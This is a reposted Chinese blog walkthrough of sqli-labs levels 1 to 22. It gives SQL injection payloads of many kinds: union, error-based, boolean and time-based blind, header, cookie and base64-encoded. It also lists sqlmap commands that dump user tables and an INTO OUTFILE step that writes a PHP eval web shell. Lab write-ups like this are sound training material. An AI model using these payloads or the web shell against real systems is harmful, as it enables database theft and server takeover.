0


sqli-labs通关详解

sqli-labs通关详解

Less1

找注入点,当输入id=1 and 1=2–+时没有变化,尝试单引号闭合找到注入类型
在这里插入图片描述

字符型注入,单引号闭合
判断字段数
在这里插入图片描述

找回显点

在这里插入图片描述
发现有两个回显点
在这里插入图片描述

开始信息收集(注意union前后格式要相同)

?id=-1' union select1,database(),version()--+database():当前数据库名
version():数据库版本
user():数据库用户,用于判断是否有最高权限

在这里插入图片描述

开始逐级爆破

爆破数据库

?id=-1' union select1,2,group_concat(schema_name) from
information_schema.schemata
group_concat()函数可以让多个数据在一行显示,但是只能显示64位,可以选择截取或者用limit的方式 显示全部数据
?id=-1' union select1,2,(schema_name) from information_schma.schemata limit 0,1--+

在这里插入图片描述

爆破表名
?id=-1' union select1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--+

在这里插入图片描述

爆破字段名
?id=-1' union select1,2,group_concat(column_name)from
information_schema.columns where table_name='users'--+

在这里插入图片描述

爆破字段
?id=-1' union select1,2,(selectgroup_concat(username,0x7e,password)from users)--+

在这里插入图片描述

Less1sqlmap运用

sqlmap.py -u ip --batch

在这里插入图片描述

猜解当前数据库名称
sqlmap.py -u ip --batch --current-db

在这里插入图片描述

猜解表名
sqlmap.py -u ip --batch -D "security"--tables

在这里插入图片描述

猜解字段
sqlmap.py -u ip -D "security"-T "users"--columns

在这里插入图片描述

脱库
sqmap.py -u ip -D "security"-T "users"--dump

在这里插入图片描述

Less2

看源码或者尝试,没有闭合方式,说明为数字型注入

在这里插入图片描述

尝试找到注入点
在这里插入图片描述

判断字段数
在这里插入图片描述

找到回显点,然后信息收集判断数据库版本
在这里插入图片描述

开始注入

爆破数据库
?id=-1 union select1,2,group_concat(schema_name)from
information_schema.schemata--+

在这里插入图片描述

爆破表单名
?id=-1 union select1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--+

在这里插入图片描述

爆破字段内容
?id=-1 union select1,2,(selectgroup_concat(username,0x7e,password)from users)--+

在这里插入图片描述

Less2sqlmap运用

扫描注入点
sqlmap.py -u ip --batch

在这里插入图片描述

爆破当前数据库
sqlmap.py -u ip --batch --current-db

在这里插入图片描述

爆破数据表
sqlmap.py -u ip --batch -D "security"--tables

在这里插入图片描述

爆破字段
sqlmap.y -u ip --batch -D "security"-T "users"--columns
最后脱库即可
sqlmap.py -u ip --batch -D "security"-T "users"--dump

Less3

在这里插入图片描述

通过源码查看闭合方式,如果在不知道源码的情况下,可以通过报错回显猜测闭合方式
在这里插入图片描述

判断字段数
在这里插入图片描述

找回显点,信息收集,然后开始逐级爆破

在这里插入图片描述

  1. 爆破表单 ?id=1’) and 1=2 union select 1,version(),group_concat(table_name)from information_schema.tables where table_schema=database()-+

在这里插入图片描述
3.爆破字段
?id=1’) and 1=2 union select 1,version(),group_concat(colum_name)from information_schema.columns where table_name=‘users’-+
在这里插入图片描述

4.爆破数据
?id=1’) and 1=2 union select 1,version(),(select
group_concat(username,0x7e,password)from users)–+

在这里插入图片描述

sqlmap运用

在这里插入图片描述

Less4

在这里插入图片描述

同样的方法通过报错的回显找到闭合方式

然后判断字段数,开始进行信息收集,然后开始爆破

1.信息收集,字段判断,爆破数据库表
?id=1") and 1=2 union select 1,version(),group_concat(table_name)from information_schema.tables where table_schema=database()–+
在这里插入图片描述

2.爆破字段
?id=1") and 1=2 union select 1,version(),group_concat(column_name)from information_schema.columns where table_name=“users”–+

在这里插入图片描述

3.最后爆破出所有数据
?id=1") and 1=2 union select 1,version(),(select
group_concat(username,0x7e,password)from users)–+

在这里插入图片描述

sqlmap一把梭

在这里插入图片描述

Less5

发现没有了用户和ID的回显,只有”You are ing…",查看有无报错回显,找到闭合方式
在这里插入图片描述

有报错的回显。然后判断字段数

在这里插入图片描述

输入一个假的条件看一下,发现没有了回显
在这里插入图片描述

条件正确有回显,条件错误没有回显,布尔盲注?其实大可不必,上面发现会有报错回显的,所以果断 采取报错注入的方法,报错注入的运用前提是需要有数据库错误的显示,看源码
在这里插入图片描述

报错常用的三个函数, extractvalue(),updatexml(),floor(),还有exp(),演示前三个

  1. 用extractvalue函数进行报错注入。

爆破数据库
?id=1’ or/and extractvalue(1,concat(0x7e,database()/(select
database()),0x7e))–+
在这里插入图片描述

爆破数据库表
?id=1’ or extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e))–+

在这里插入图片描述
爆破字段
?id=1’ or extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=‘users’),0x7e))–+
在这里插入图片描述

group-concat()函数可能放不下所有内容,可以采用截取或者limit函数读取

爆破数据内容
?id=1’ or extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))–+
在这里插入图片描述

  1. 用updatexml()函数进行报错注入

爆破数据库表
?id=1’ or updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1)–+

爆破字段
?id=1’ or updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=‘users’),0x7e),1)–+

爆破数据内容
?id=1’ or updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)–+
3.通loor()函数进行报错注入,前提需要知道有多少字段数

爆破数据库
?id=-1’ union select 1,count(*),concat(0x7e,(database()),0x7e,floor(rand(0)*2))x from information_schema.tables group by x–+
在这里插入图片描述

爆破数据库表
?id=-1’ union select 1,count(*),concat(0x7e,(select (table_name)from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x–+
在这里插入图片描述

爆破字段
?id=-1’ union select 1,count(*),concat(0x7e,(select (column_name)from information_schema.columns where table_name=‘users’ limit 0,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x–+

在这里插入图片描述

爆破数据库内容
?id=-1’ union select 1,count(*),concat(0x7e,(select (username)from users limit 0,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x–+

在这里插入图片描述

sqlmap直接梭

在这里插入图片描述

Less6

less6与less5的唯一区别在于闭合方式为双引号"

在这里插入图片描述

Less7

在这里插入图片描述

是不是有一点熟悉呢, SQl注入的写入与读取
读取文件 load_file(文件的路径)
写入文件into outfile(),into_dumpfile()
首先还是先猜解闭合方式,单引号家两个小括号 '))
在这里插入图片描述

猜解字段数

通过页面回显布尔方式猜解到字段数为3,能够读写需要的几个条件

  1. 需要高权限(root权限)
  2. 需要有问价写入权限secure_file_priv不是NULL
  3. 需要知道绝对路径
  4. 魔术引号gbc时关闭的 magic_quotes_gpc = Off 关键步骤写入木马

?id=1’)) and 1=2 union select 1,2,“<?php @eval($_POST['cmd']) ?>”%20 into outfile “X:\xx\xx\xx\xx\shell.php”–+
在这里插入图片描述

写入之后蚁剑提权

在这里插入图片描述

Less8

找到闭合方式为单引号,但是没有报错显示,因此报错注入的方法已经不能够实现注入
在这里插入图片描述

对和错返回不同的页面回显,可以采用布尔盲注的方式,比如判断字段数
在这里插入图片描述

由此可以判断字段数为3

猜解数据库名字的长度
?id=-1’ or length(database())=8–+
小tips:一那么采用逻辑或,因为无法确保前面的条件一定为真

在这里插入图片描述

逐一猜解数据库
?id=-1’ or ascii(substr(database(),1,1))=115–+
或者
?id=-1’ or ascii(mid(database(),1,1))=115–+
或者
?id=-1’ or mid(database(),1,1)=‘s’–+
在这里插入图片描述

按照相同的方法猜解数据表的名字和字段内容
?id=-1’ or ascii(mid(select (table_name) from information_schema.tables where table_schema=database() limit 1,1))=?–+

对于布尔盲注的问题,一般采用脚本进行猜解或者使用sqlmap

sqlmap梭Less8

在这里插入图片描述

Less9

尝试了N种闭合方式之后发现页面的回显都是一样的并且没有任何报错信息,通过源码找到字符型闭 合,浅试一下时间盲注

例如
?id=-1’ or if(length(database())=8,sleep(5),0)–+
在这里插入图片描述

发现页面的响应有了延迟,再burpsuite里面看一下
在这里插入图片描述

响应的时间明显延长了,那么就可以通过这样猜解出数据库信息了

猜解数据库名称
?id=-1’ or if(ascii(mid(database(),1,1))<=135,sleep(5),0)–+
相同的方式猜解数据表数据字段

sqlmap运用时间盲注

![在这里插入图片描述](https://img-blog.csdnimg.cn/7681b4a1128e4ffd9f8d92fc92465b31.png)

Less10

![在这里插入图片描述](https://img-blog.csdnimg.cn/32a53e32f5a849be83eeec6934091d5b.png)

与Less9的区别在于闭合方式为 双引号,同样是时间盲注

Less11

在这里插入图片描述

看见登录框,为方便注入, burpsuite准备,抓包后找注入点和闭合方式
在这里插入图片描述

注入点在username处,闭合方式为单引号
在这里插入图片描述

字段数只有2。
payload

在这里插入图片描述

除了联合注入外还可以报错注入,方式很多,都可以尝试一下

sqlmap Less11post运用

方式一
启动sqlmap探测注入点
sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch
爆破当前数据库名
sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch --current-db
爆破数据表
sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库
sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security -T users - -dump

在这里插入图片描述

方式二
将抓包内容保存到 .txt文件中

在这里插入图片描述

启动sqlmap
sqlmap.py -r txt文件位置 -p 要扫描的点

在这里插入图片描述

爆破数据库
sqlmap.py -r .txt文件位置 -p 扫描的位置 --current-db
爆破表
sqlmap.py -r .txt文件位置 -p 扫描的位置 -D security --tables
脱库
sqlmap.py -r .txt文件位置 -p 扫描的位置 -D security --dump

Less12

通过简单测试,发现闭合方式为"),如果找到源码会发现与Less11的区别就是闭合方式的不一样,注入方 式完全一样, Less11采用联合查询的注入方式, Less12尝试一次报错注入的方式,字段数依旧为2
在这里插入图片描述

采用extractvalue()函数报错注入

查询数据库表
uname=-1") or extractvalue(1,concat(0x7e,(select database()),0x7e)) – +&passwd=admin&submit=Submit

在这里插入图片描述

爆破数据表
uname=-1") or extractvalue(1,concat(0x7e,(select (table_name)from information_schema.tables where table_schema=database() limit 2,1),0x7e)) – +&passwd=admin&submit=Submit

在这里插入图片描述

爆破字段名
uname=-1") or extractvalue(1,concat(0x7e,(select (column_name)from information_schema.columns where table_name=‘users’ limit 8,1),0x7e)) – +&passwd=admin&submit=Submit
在这里插入图片描述

爆破字段
uname=-1") or extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) --+&passwd=admin&submit=Submit

在这里插入图片描述

用updatexml()函数进行报错注入

查询数据库表
uname=-1") or updatexml(1,concat(0x7e,(select database()),0x7e),1) – +&passwd=admin&submit=Submit
爆破数据表
uname=-1") or updatexml(1,concat(0x7e,(select (table_name)from information_schema.tables where table_schema=database() limit 2,1),0x7e),1) – +&passwd=admin&submit=Submit
爆破字段名
uname=-1") or updatexml(1,concat(0x7e,(select (column_name)from information_schema.columns where table_name=‘users’ limit 8,1),0x7e),1) – +&passwd=admin&submit=Submit
爆破字段
uname=-1") or updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+&passwd=admin&submit=Submit

用floor()函数进行爆破

爆破数据库
uname=-1") union select count(*),concat(0x7e,database(),0x7e,floor(rand(0)2))x from information_schema.tables group by x–+&passwd=admin&submit=Submit
爆破数据表
uname=-1") union select count(
),concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)2))x from information_schema.tables group by x-- +&passwd=admin&submit=Submit
爆破字段表
uname=-1") union select count(
),concat(0x7e,(select column_name from information_schema.columns where table_name=‘users’ limit 0,1),0x7e,floor(rand(0)2))x from information_schema.tables group by x-- +&passwd=admin&submit=Submit
爆破字段
uname=-1") union select count(
),concat(0x7e,(select username from users limit 0,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x-- +&passwd=admin&submit=Submit

Less13

在这里插入图片描述

与Less12的唯一区别为闭合方式为’)

Less14

![在这里插入图片描述](https://img-blog.csdnimg.cn/cc886ce5a69149a4a363879a943b90bf.png)

与Less12的区别闭合方式为"

Less15

![在这里插入图片描述](https://img-blog.csdnimg.cn/9e37f8e7e3844eda8279f646018c6b51.png)

通过图片的回显通过布尔盲注的方式发现闭合方式为单引号闭合

正确的数据与错误数据页面回显的图片不一样,可以尝试一下布尔盲注
payload
在这里插入图片描述

尝试猜解一下数据库的名字
在这里插入图片描述

通过图片的回显情况逐一猜解内容,当然也可以通过延时注入的方式猜解一下

在这里插入图片描述

sqlmap猜解布尔盲注

因为Less15为post的提交方式,首先抓包将数据包头存储在一个文件中

sqlmap.py -r 文件位置 -p 扫描位置 --batch --current-db //爆破当前数据库名
sqlmap…py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库

在这里插入图片描述

Less16

在Less15的原题上将闭合方式变成了")

在这里插入图片描述

Less17

提示密码重设置,猜一猜注入点会不会事密码的位置呢,验证一下
在这里插入图片描述

payload

在这里插入图片描述

sqlmap梭

在这里插入图片描述

Less18

网页记录了本地ip的信息,说明可能事数据库记录了本机的信息,即后台获取了一些诸如Ip的信息保存 到数据库中,并且页面返回了数据包user-agent的信息,那么在请求头中就可能存在注入点
在这里插入图片描述

通过源码看一下
在这里插入图片描述

源代码标识获取浏览器信息,即user-Agent部分,表示客户端通过什么浏览器向后台请求
在这里插入图片描述

在后面的请求中也有将该部分进行存储添加到数据库,现在就可以通过一些手段在数据添加的同时进行 注入
payload

'and updatexml(1,concat(0x7e,database(),0x7e),1),1,1)#

在这里插入图片描述

sqlmap进行头部注入
在头部注入爆破中, sqlmap需要提高扫描等级 level和risk

level x(x为1-5) 当为2时会对头部的cookie进行扫描注入尝试,x>=3时队user-Agent,ip,referer 参数进行扫描
risk x(x 1-3) 1时进行大部分扫描 2会增加基于事件的测试语句 3会增加or语句的sql注入

在这里插入图片描述
或者将数据包保存下来
在这里插入图片描述

在user-Agent的末尾打上*

在这里插入图片描述

Less19

成功登录后返回referer位置,说明在数据包头referer位置有注入点
在这里插入图片描述

payload

在这里插入图片描述

sqlmap 梭

然后按照格式再sqlmap上进行爆破

在这里插入图片描述

Less20

登录之后发现有很明显的cookie提示,可想而知在哪里注入
在这里插入图片描述

登录之后刷新页面,一定要保证cookie还在存在的前提下进行抓包
判断字段数,发现没有字段回显,采取报错,盲注手段都可以

在知道字段的前提下可以使用floor()函数进行报错注入
在这里插入图片描述

爆破数据库名
Cookie: uname=admin’ union select 1,count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))x from information_schema.tables group by x#

在这里插入图片描述

爆破表名
Cookie: uname=admin’ union select 1,count(*),concat(0x7e,(select (table_name)from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x#
在这里插入图片描述

爆破字段名
Cookie: uname=admin’ union select 1,count(*),concat(0x7e,(select (column_name)from information_schema.columns where table_name=‘users’ limit 0,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x#
在这里插入图片描述

爆破字段内容
Cookie: uname=admin’ union select 1,count(*),concat(0x7e,(select username/password from users limit 0,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x#

在这里插入图片描述

sqlmap cookie注入

在这里插入图片描述

打上* level 等级2

在这里插入图片描述

Less21

成功登录后发现在Cookie处登录的信息被进行了加密,说明在客户端登录的信息被进行了加密
在这里插入图片描述

可以尝试在每次注入前对payload进行加密在注入
在这里插入图片描述

先将语句进行base64加密,再进行注入,通过回显找到闭合方式为’)
在这里插入图片描述

更改payload再次进行注入
在这里插入图片描述

找到了字段数,尝试爆破数据库名
payload

admin’) and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
base64加密 YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdl KSwxKSM=
在这里插入图片描述

对以往常规的爆破语句进行base64加密后进行爆破即可

sqlmap加密注入运用

将数据包头的内容重新粘贴到新的文档中,再Cookie处标上*
启动sqlmap,对进行加密注入的数据需要用到tamper模块

扫描
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py”
爆破数据库
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” -D security - -tables
脱库
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” -D security - T users --dump

在这里插入图片描述

Less22

与Less21的唯一区别在于此关闭合方式为双引号"

在这里插入图片描述

标签: 数据库 安全 sql

本文转载自: https://blog.csdn.net/m0_52051132/article/details/127335683
版权归原作者 爱睡觉的扬扬 所有, 如有侵权,请联系我们删除。

“sqli-labs通关详解”的评论:

还没有评论